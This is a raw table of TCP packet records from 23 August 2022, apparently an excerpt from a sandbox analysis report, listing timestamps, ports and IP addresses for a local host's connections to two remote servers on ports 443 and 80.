Aug 23, 2022 03:42:52.049777985 CEST	443	49790	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:52.049877882 CEST	443	49790	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:52.049956083 CEST	49790	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:52.049979925 CEST	49790	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:52.062875986 CEST	49790	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:52.062901020 CEST	443	49790	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:53.035670042 CEST	49794	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:53.035706997 CEST	443	49794	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:53.035810947 CEST	49794	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:53.038569927 CEST	49794	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:53.038592100 CEST	443	49794	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:53.114609957 CEST	443	49794	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:53.114718914 CEST	49794	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:53.144341946 CEST	49794	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:53.144361973 CEST	443	49794	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:53.147532940 CEST	49794	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:53.147550106 CEST	443	49794	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:53.172348976 CEST	443	49794	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:53.172413111 CEST	443	49794	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:53.172442913 CEST	49794	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:53.172482967 CEST	49794	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:53.229861975 CEST	49794	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:53.229897022 CEST	443	49794	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:53.445463896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.479298115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.572467089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.572505951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.572530985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.572551966 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.572576046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.572598934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.572597027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.572616100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.572639942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.572654963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.572663069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.572664022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.572689056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.572690964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.572731018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.572748899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.606304884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606343985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606369019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606393099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606415987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606439114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606463909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606487036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606509924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606514931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.606532097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606559038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606568098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.606584072 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606609106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606627941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.606633902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606636047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.606659889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606674910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.606684923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606703043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.606734037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606736898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.606761932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606770039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.606786966 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606796026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.606808901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.606813908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.606832027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.606870890 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.640523911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.640580893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.640688896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.640748978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.640780926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.640810966 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.640811920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.640842915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.640877008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.640908003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.640938044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641062975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641123056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641136885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.641172886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641221046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641268015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641303062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641359091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641417980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641463995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.641464949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641503096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641550064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641608000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641622066 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.641640902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641669989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641700029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641731024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641762018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641789913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641820908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641850948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641880989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641910076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641941071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.641972065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.642002106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.642043114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.642074108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.642103910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.642117023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.642136097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.642164946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.642261982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.675420046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.675499916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.675561905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.675573111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.675605059 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.675626040 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.675659895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.675693035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.675784111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.675823927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.675883055 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.675911903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.675946951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.675956964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.675965071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676011086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676014900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676075935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676078081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676132917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676147938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676198006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676198959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676255941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676260948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676300049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676325083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676354885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676363945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676417112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676433086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676474094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676476002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676532030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676539898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676583052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676621914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676626921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676636934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676671982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676681042 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676726103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676731110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676779032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676779985 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676836014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676839113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676888943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676893950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676933050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676951885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.676971912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.676990986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677011967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677051067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677057981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677067995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677105904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677110910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677161932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677175999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677225113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677237988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677265882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677294970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677306890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677315950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677345991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677365065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677385092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677406073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677426100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677442074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677464008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677499056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677504063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677514076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677556038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677560091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677618980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677619934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677678108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677680016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677732944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677743912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677783966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677792072 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677840948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677850962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677897930 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677936077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677938938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677952051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.677979946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.677994013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.678020000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678029060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.678061008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678090096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678119898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678150892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678190947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678220034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678231001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.678250074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678281069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678311110 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678339958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678369999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678400040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678435087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678472996 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.678750038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.701551914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.701606035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.701647997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.701674938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.701689005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.701721907 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.701729059 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.701730013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.701735973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.701770067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.701796055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.701834917 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.701875925 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.701919079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.701942921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.701972008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.701986074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.702028036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.702030897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.702088118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.702121019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.702159882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.702167988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.702260017 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.705956936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.706002951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.706058025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.706222057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.706279039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.706526041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.708637953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.708679914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.708750963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.709355116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.709408998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.709429979 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.709461927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.709505081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.709512949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.709527969 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.709536076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.709595919 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.709606886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.709666967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.709671021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.709721088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.709737062 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.709777117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.709793091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.709847927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.712548971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.712646008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.712879896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.712946892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.712950945 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713004112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713011026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713062048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713069916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713100910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713114023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713143110 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713152885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713184118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713207006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713222027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713246107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713265896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713285923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713401079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713403940 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713457108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713459015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713511944 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713519096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713582039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713582039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713639975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713689089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713731050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713745117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713771105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713783026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713812113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713833094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713857889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713875055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713922024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713922977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.713979006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.713989973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714037895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714046955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.714082003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714093924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.714122057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714162111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714164972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.714176893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.714202881 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714215994 CEST	49774	80	192.168.2.3	45.95.11.158
